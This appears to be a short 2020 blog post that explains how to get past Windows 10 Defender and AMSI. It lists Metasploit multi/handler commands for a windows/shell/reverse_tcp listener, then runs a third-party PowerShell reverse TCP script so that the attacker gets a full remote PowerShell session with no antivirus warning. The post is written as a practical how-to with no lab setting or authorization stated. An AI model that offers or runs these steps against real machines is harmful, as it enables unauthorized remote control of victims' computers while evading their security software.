Defeat Windows 10 with Defender AMSI

Most of the standard off the shelf packages that generate payloads on Kali Linux are useless against the latest Windows 10 Defender (as of writing it is December 2020). I was able to generate payloads that could get around the virus checks, but the problem is wen executing. Windows AMSI (Anti Malware Scan Interface) will recognize and kill the file.

After a lot of hunting around I found this

This is a collection of power shell scripts that will open a reverse_tcp connection. So far it’s the only thing I have managed to make work on the latest Windows 10 defender, and it defeats AMSI.

So go ahead and start up metasploit on your linux machine

$ msfconsole

and then we will use our multi handler with a windows shell.

msf6 exploit(multi/handler) > set payload windows/shell/reverse_tcp

and set the LHOST and LPORT parameters before starting the listener.

msf6 exploit(multi/handler) > set LHOST
msf6 exploit(multi/handler) > set LPORT 4444
msf6 exploit(multi/handler) > exploit

Now we will go to our windows machine and run one of the powershell_reverse_tcp.ps1 script from Ivan Sincek.

powershell reverse tcp script from Ivan Sincek

You will see that it runs successfully without any warnings despite windows defender being turned on.

Powershell successfully bypassing windows 10 defender

On out linux machine we now have a full powershell

kali linux power shell in metasploit

The script from Ivan is really excellent, and after many hours trying its of different payloads, editing payloads and so on, this was the best results I got, and it’s just “off the shelf” solution!


Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

%d bloggers like this: